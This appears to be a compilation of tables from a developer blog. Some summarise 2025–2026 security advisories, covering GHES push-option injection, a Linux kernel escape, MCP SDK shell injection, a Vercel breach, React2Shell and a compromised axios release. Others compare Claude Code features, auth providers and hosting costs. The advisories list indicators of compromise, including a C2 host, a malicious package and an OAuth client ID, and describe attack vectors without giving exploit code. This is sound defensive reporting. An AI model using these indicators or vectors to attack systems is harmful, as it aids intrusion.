Public disclosure	April 28, 2026
Required access	Any authenticated user with push access to one repo
Impact (GHES)	Full server compromise, all hosted repositories, internal secrets
Impact (github.com)	Cross-tenant read access on shared storage nodes
Patched GHES versions	3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.7, 3.19.4, 3.20.0
What you do	Upgrade GHES today, grep audit logs for `;` in push options, review the babeld changelog

GHES branch	First patched release
3.14.x	3.14.25
3.15.x	3.15.20
3.16.x	3.16.16
3.17.x	3.17.13
3.18.x	3.18.7
3.19.x	3.19.4
3.20.x	3.20.0

Detail	Info
CVE	CVE-2026-31431
Nickname	Copy Fail
Class	Linux kernel privilege escalation, container escape
Subsystem	Crypto API, `algif_aead`
Disclosed	May 1, 2026
Found by	Xint
Patch	Mainline commit `a664bf3d603d`
Affected	Most Linux distros on unpatched kernels: Ubuntu, RHEL 8/9, Debian, Fedora, SUSE, Amazon Linux, Arch, CloudLinux
What runtime-default seccomp does	Nothing
What you do	Patch the host kernel, drop a custom seccomp profile blocking AF_ALG, audit privileged DaemonSets

Distro	Status
Ubuntu	Most kernels not yet patched, monitor USN
Debian sid/unstable	Patched
Debian stable/bookworm	Not patched
RHEL 8/9	Patches in progress
Fedora	Patches in progress
SUSE/SLES	Patches in progress
Amazon Linux	Patches in progress
CloudLinux	Not patched
Arch Linux	Likely patched on `linux` package update

Detail	Info
Disclosed	April 15, 2026
Researchers	OX Security (Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok, Roni Bar)
Affected	Anthropic MCP SDKs in Python, TypeScript, Java, Rust
Root cause	User-controlled input reaches `StdioServerParameters` without sanitization, enabling shell injection at server spawn
Attacker capability	Remote code execution on the host running the MCP client or server
Scale	150M+ downloads, 7,000+ public servers, up to 200,000 vulnerable instances
Notable CVEs	CVE-2026-30623 (LiteLLM), CVE-2026-30615 (Windsurf), CVE-2025-65720 (GPT Researcher), plus 7 more
Affected downstreams	LiteLLM, LangChain, LangFlow, Cursor, VS Code, Windsurf, Claude Code, Gemini CLI, Flowise
Anthropic's response	Behavior is "by design"; sanitization is "the developer's responsibility"

Detail	Info
Disclosed	April 19, 2026
Initial compromise	Context.ai AWS breach, March 2026
Initial vector	Stolen OAuth tokens for a Google Workspace OAuth app
OAuth client ID	`110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com`
Affected	"A limited subset of customers" whose Vercel credentials were compromised
Data exposure	Environment variables not marked sensitive may have been read
Data NOT exposed	Environment variables marked sensitive
Response	Mandiant engaged, law enforcement notified, affected customers contacted directly
Services	Remained operational throughout

	CVE-2026-40261	CVE-2026-40176
CVSS	8.8	7.8
Attack vector	Network (package metadata)	Local (root composer.json)
Supply chain risk	High	Low
Exploitable via dependencies	Yes	No
Requires Perforce	No	No

Type	What it is	Runs when	Defined in
Slash commands	Pre-written prompts you trigger with `/`	When you type `/command`	`.claude/commands/`
Skills	Larger instruction sets Claude loads on demand	When a skill matches the task	Plugin packages
Agents	Autonomous sub-processes that handle complex tasks	When Claude spawns them	Built-in or custom
Plugins	Packages that bundle skills, commands, hooks, and MCP servers	At install time	Plugin marketplace or GitHub

	Slash Commands	Skills
Triggered by	You type `/name`	Claude detects a matching task
Size	Short prompts (10-50 lines)	Detailed instructions (50-500 lines)
Complexity	Single prompt	Multi-step workflows
Tool access	Uses whatever tools are available	Can restrict to specific tools
Packaged in	`.claude/commands/` directory	Plugins

Dimension	CLI	MCP	Winner
💰 Token cost	~200 tokens per command	~44K tokens to load schema	CLI
🧠 Native knowledge	LLMs pretrained on CLI syntax	New schema learned at runtime	CLI
🔗 Composability	Unix pipes chain natively	Multiple LLM calls needed	CLI
🔐 Multi-user auth	Shared token, can't revoke per user	Per-user OAuth, revoke anytime	MCP
🔄 Stateful sessions	New TCP connection per command	Persistent connection, reuses state	MCP
🏢 Enterprise governance	Only ~/.bash_history	Audit, revoke, monitor built in	MCP

Scenario	Use CLI	Use MCP	Why
Quick kubectl commands	✅		LLM knows kubectl, low tokens
AWS infrastructure queries	✅		aws-cli is well-known, pipes work
Log analysis with grep/awk	✅		Unix pipes are unbeatable here
Multi-user Slack bot		✅	Per-user auth is essential
Database exploration session		✅	Persistent connection, stateful
CI/CD pipeline triggers	✅		Simple command, no state needed
Internal tool with custom API		✅	No pretrained CLI knowledge anyway
Compliance-heavy environment		✅	Audit trails are non-negotiable
One-off script automation	✅		Lower overhead, faster
Long agent session (50+ calls)		✅	Connection reuse, amortized schema cost

	Auth0	Clerk	Firebase Auth	Ory (self-hosted)
1,000 MAU	Free	Free	Free	Free (your infra cost)
10,000 MAU	~$230/mo	~$100/mo	Free	~$50-100/mo (infra)
100,000 MAU	~$1,300/mo	~$500/mo	$0.06/MAU	~$50-100/mo (infra)
SAML SSO	Enterprise plan	$50/connection	Not included	Included (Polis)
Data residency	Enterprise plan	Enterprise plan	GCP regions	You choose
Vendor lock-in	High	High	Moderate	None

Service	Database	Required Extensions
Kratos	`kratos`	`pg_trgm`, `btree_gin`, `uuid-ossp`
Hydra	`hydra`	`uuid-ossp`
Polis	`polis`	None (standard Postgres)

Feature	OSS	Enterprise (OEL)
OIDC authentication	Yes (Kratos)	Yes
OAuth2 token issuance	Yes (Hydra)	Yes
SAML bridge	Yes (Polis/Jackson)	Yes
SCIM directory sync	Yes (Polis)	Yes
Resource Owner Password Credentials	No	Yes (Hydra OEL)
Custom token prefixes	No	Yes (Hydra OEL)
CVE patches with SLAs	No	Yes
Premium support	Community only	Yes

	Vercel	Heroku	Railway	Coolify on DO
3 apps	$60/mo (Pro)	$75/mo (3 dynos)	~$15-45/mo	$0 (included)
PostgreSQL	$25/mo (Neon)	$25/mo (Mini)	~$10/mo	$0 (self-hosted)
Redis	$10/mo	$15/mo	~$5/mo	$0 (self-hosted)
SSL	Included	Included	Included	Included (Traefik)
Team seats	$20/seat	$0	$0	$0
Total (2 devs)	$135/mo	$115/mo	$30-60/mo	$24-48/mo

Setup	RAM	CPU	Monthly Cost
Coolify + 1 small app	2GB	1 vCPU	$12
Coolify + 2-3 apps + PostgreSQL	4GB	2 vCPU	$24
Coolify + 5+ apps + databases + Redis	8GB	4 vCPU	$48
Heavy workloads (10+ apps)	16GB	8 vCPU	$96

Detail	Info
CVE	CVE-2025-55182
Nickname	React2Shell
CVSS Score	10.0 (Critical)
Vulnerability	Unsafe deserialization in React Server Components
Attack Vector	Single unauthenticated HTTP POST request
Affected	Next.js 13.3+ through 16.x with App Router
Hosts Breached	766 in 24 hours
Fix	Update to latest patched version + rotate all secrets

Date	Event
Nov 29, 2025	Vulnerability reported
Dec 3, 2025	Public disclosure and patch
Dec 4, 2025	PoC published, roughly 30 hours after the patch
Dec 4, 2025	Active exploitation begins immediately
Dec 3-11, 2025	Cloudflare blocks 582 million exploit attempts
Apr 2, 2026	Cisco Talos publishes research on the 766-host breach

Branch	Vulnerable	Patched
14.x	14.0.0 - 14.2.34	14.2.35
15.0.x	15.0.0 - 15.0.7	15.0.8
15.1.x	15.1.0 - 15.1.11	15.1.12
15.2.x	15.2.0 - 15.2.8	15.2.9
15.3.x	15.3.0 - 15.3.8	15.3.9
15.4.x	15.4.0 - 15.4.10	15.4.11
15.5.x	15.5.0 - 15.5.9	15.5.10
16.0.x	16.0.0 - 16.0.10	16.0.11
16.1.x	16.1.0 - 16.1.4	16.1.5

CVE	CVSS	What It Does
CVE-2025-29927	9.1	Middleware auth bypass via header spoofing
CVE-2025-55183	5.3	Server Function source code exposure
CVE-2025-55184	7.5	DoS via cyclical Promise references
CVE-2025-67779	7.5	DoS, incomplete fix for CVE-2025-55184
CVE-2026-23864	7.5	Denial of Service in RSC

Detail	Info
Affected versions	`axios@1.14.1` and `axios@0.30.4`
Safe versions	`axios@1.14.0` and `axios@0.30.3`
Malicious dependency	`plain-crypto-js@4.2.1`
C2 server	`sfrclak.com:8000`
Platforms targeted	macOS, Windows, Linux
Window of exposure	Starting 2026-03-31T00:21:58Z